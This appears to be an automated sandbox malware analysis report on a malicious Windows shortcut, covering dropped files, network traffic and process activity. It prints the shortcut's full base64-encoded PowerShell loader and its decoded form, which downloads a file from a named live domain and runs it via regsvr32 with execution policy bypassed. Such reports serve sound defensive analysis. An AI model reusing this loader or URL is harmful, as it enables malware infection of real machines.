                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qabn4yu3.pai.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlc1jgvp.j20.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):334
                                    Entropy (8bit):3.7223387370453302
                                    Encrypted:false
                                    SSDEEP:6:Q7wNc2qGXlMbHuaY0JhdapkyAdJ+vKfkrgmwevAGTDYkWTAlANmwevAGTY:Q0N7XoO/6hdiOMK4F9vTYkLlF9vI
                                    MD5:6671AB6B83187365EFE60AFFB0A9E065
                                    SHA1:5628BE1C0E052BF9D8F453B9593A40596927E4F5
                                    SHA-256:747DBA489A369CBD5AE9D3A71C0D268006BC7EAF753E3ED7D41A60489DC7FDA0
                                    SHA-512:A98EEA254D3CD2291956C35CFE4280E39405C39658976A74834B29B3464722B9D52305751845FC44337827199B3630E6C7DED1ACF6BBF113A37C3F8EEEA9896E
                                    Malicious:true
                                    Preview:..$.P.r.o.g.r.e.s.s.P.r.e.f.e.r.e.n.c.e.=.".S.i.l.e.n.t.l.y.C.o.n.t.i.n.u.e.".;.I.W.R. .h.t.t.p.:././.f.o.c.u.s.m.e.d.i.c.a...i.n./.f.m.l.i.b./.I.x.B.A.B.M.h.0.I.2.c.L.M.3.q.q.1.G.V.v./. .-.O.u.t.F.i.l.e. .$.e.n.v.:.T.E.M.P./.z.n.s.r.P.e.c.X.V.b...d.M.o.;.R.e.g.s.v.r.3.2...e.x.e. .$.e.n.v.:.T.E.M.P./.z.n.s.r.P.e.c.X.V.b...d.M.o.....

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YS7JQLL678Z5VLFM7OES.temp

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4507
                                    Entropy (8bit):3.776060397369433
                                    Encrypted:false
                                    SSDEEP:48:HCyu57oRnty6YFzqbFNSogZoqHty6YFzq8WNSogZoPG1:HCyu5sDzYFWb+HBzYFWEHS4
                                    MD5:675CED33417DC1A94424BCF0DFD7565C
                                    SHA1:32B7E07AFA73E0C80ABD202C72875C6659984DEB
                                    SHA-256:6D2309DCCA129B4E0BC7ECF118C3C9263FBC052A5ED1A95146186A055E717A82
                                    SHA-512:4553CC265D3251A6D0B300A36289E0F45799C647B68FE461BD0A7FB58365B4AD3F97A6AECC13A62C982DAB85674C73DE677B08760981BA4E247F5DA96AC17A92
                                    Malicious:false
                                    Preview:...................................FL..................F. .. ....&...Y.....T.\...ApT.\.._............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...:.n..Y...f.T.\....j.2._..."Z.H .DRLFLG~1.LNK..N......GX)w"Z.H..........................s!..D.R.l.F.l.g.7.O.V.8...l.n.k.......S...............-.......R.............Y.....C:\Users\user\Desktop\DRlFlg7OV8.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......878164...........hT..CrF.f4... ..............%..hT..CrF.f4... ..............%.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....A..O8....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1....."Z.H..Windows.@......OwH"Z.H....3.....................V...W.i.n.d.o.w.s.....Z.1....."Z.H..System32..B......OwH"Z.H...........................Q..S.y.s.t.e.m.3.2.....t.1......O.I..Window

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bad555e264758fd.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4507
                                    Entropy (8bit):3.776060397369433
                                    Encrypted:false
                                    SSDEEP:48:HCyu57oRnty6YFzqbFNSogZoqHty6YFzq8WNSogZoPG1:HCyu5sDzYFWb+HBzYFWEHS4
                                    MD5:675CED33417DC1A94424BCF0DFD7565C
                                    SHA1:32B7E07AFA73E0C80ABD202C72875C6659984DEB
                                    SHA-256:6D2309DCCA129B4E0BC7ECF118C3C9263FBC052A5ED1A95146186A055E717A82
                                    SHA-512:4553CC265D3251A6D0B300A36289E0F45799C647B68FE461BD0A7FB58365B4AD3F97A6AECC13A62C982DAB85674C73DE677B08760981BA4E247F5DA96AC17A92
                                    Malicious:false
                                    Preview:...................................FL..................F. .. ....&...Y.....T.\...ApT.\.._............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...:.n..Y...f.T.\....j.2._..."Z.H .DRLFLG~1.LNK..N......GX)w"Z.H..........................s!..D.R.l.F.l.g.7.O.V.8...l.n.k.......S...............-.......R.............Y.....C:\Users\user\Desktop\DRlFlg7OV8.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......878164...........hT..CrF.f4... ..............%..hT..CrF.f4... ..............%.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....A..O8....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1....."Z.H..Windows.@......OwH"Z.H....3.....................V...W.i.n.d.o.w.s.....Z.1....."Z.H..System32..B......OwH"Z.H...........................Q..S.y.s.t.e.m.3.2.....t.1......O.I..Window

                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                    Static File Info

                                    General

                                    File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=134, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                    Entropy (8bit):4.00318050714148
                                    TrID:
                                    • Windows Shortcut (20020/1) 100.00%
                                    File name:DRlFlg7OV8.lnk
                                    File size:2'399 bytes
                                    MD5:3952caf999263773be599357388159e0
                                    SHA1:76c39a3a4823beab79e497bfcdbc2367188d95c4
                                    SHA256:09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924
                                    SHA512:6a69d7872ba14c12a6a7a2735bbc33f52b8cb35fbec20e8a7530fce7cb9097fe25a99247c532912da470e19c1095582f023a31718415ea2c697f946d981cab10
                                    SSDEEP:24:8w+/BHYVKVWx+/CWTdzzEqXRIZJiXRF4ziVg0GnbI2HD2RGdNarab/8FC28P8kP4:8n5a8JdXjvg7nbI2qcdN4abG15R
                                    TLSH:70417E182AD50218EBE2EF317CF96641D8A7BD23E9318F4D008D864D6B13650ED61F3E
                                    File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                    File Icon

                                    Icon Hash:fc3cf4c4dcd9d9ed

                                    Static Windows Shortcut Info

                                    General

                                    Relative Path:..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Command Line Argument:-command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "%tmp%\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "%tmp%\gjRzEyUDTV.ps1"; Remove-Item "%tmp%\gjRzEyUDTV.ps1"
                                    Icon location:shell32.dll

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-02T10:04:37.521177+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.1649706166.62.28.14780TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 2, 2025 10:04:36.233009100 CET4970680192.168.2.16166.62.28.147
                                    Jan 2, 2025 10:04:36.237941980 CET8049706166.62.28.147192.168.2.16
                                    Jan 2, 2025 10:04:36.238040924 CET4970680192.168.2.16166.62.28.147
                                    Jan 2, 2025 10:04:36.239800930 CET4970680192.168.2.16166.62.28.147
                                    Jan 2, 2025 10:04:36.244677067 CET8049706166.62.28.147192.168.2.16
                                    Jan 2, 2025 10:04:37.520904064 CET8049706166.62.28.147192.168.2.16
                                    Jan 2, 2025 10:04:37.520955086 CET8049706166.62.28.147192.168.2.16
                                    Jan 2, 2025 10:04:37.521177053 CET4970680192.168.2.16166.62.28.147
                                    Jan 2, 2025 10:04:38.178755999 CET4970680192.168.2.16166.62.28.147

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 2, 2025 10:04:36.209846020 CET5373153192.168.2.161.1.1.1
                                    Jan 2, 2025 10:04:36.221688032 CET53537311.1.1.1192.168.2.16

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 2, 2025 10:04:36.209846020 CET192.168.2.161.1.1.10x6f8aStandard query (0)focusmedica.inA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 2, 2025 10:04:36.221688032 CET1.1.1.1192.168.2.160x6f8aNo error (0)focusmedica.in166.62.28.147A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • focusmedica.in

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.1649706166.62.28.147806440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 2, 2025 10:04:36.239800930 CET186OUTGET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Host: focusmedica.in
                                    Connection: Keep-Alive
                                    Jan 2, 2025 10:04:37.520904064 CET507INHTTP/1.1 404 Not Found
                                    Date: Thu, 02 Jan 2025 09:04:36 GMT
                                    Server: Apache
                                    Content-Length: 315
                                    Keep-Alive: timeout=5
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                    Jan 2, 2025 10:04:37.520955086 CET507INHTTP/1.1 404 Not Found
                                    Date: Thu, 02 Jan 2025 09:04:36 GMT
                                    Server: Apache
                                    Content-Length: 315
                                    Keep-Alive: timeout=5
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:04:04:29
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"
                                    Imagebase:0x7ff7582a0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:04:04:29
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6684c0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:04:04:32
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff62c440000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:04:04:33
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
                                    Imagebase:0x7ff7582a0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:04:04:37
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo
                                    Imagebase:0x7ff666310000
                                    File size:25'088 bytes
                                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    No disassembly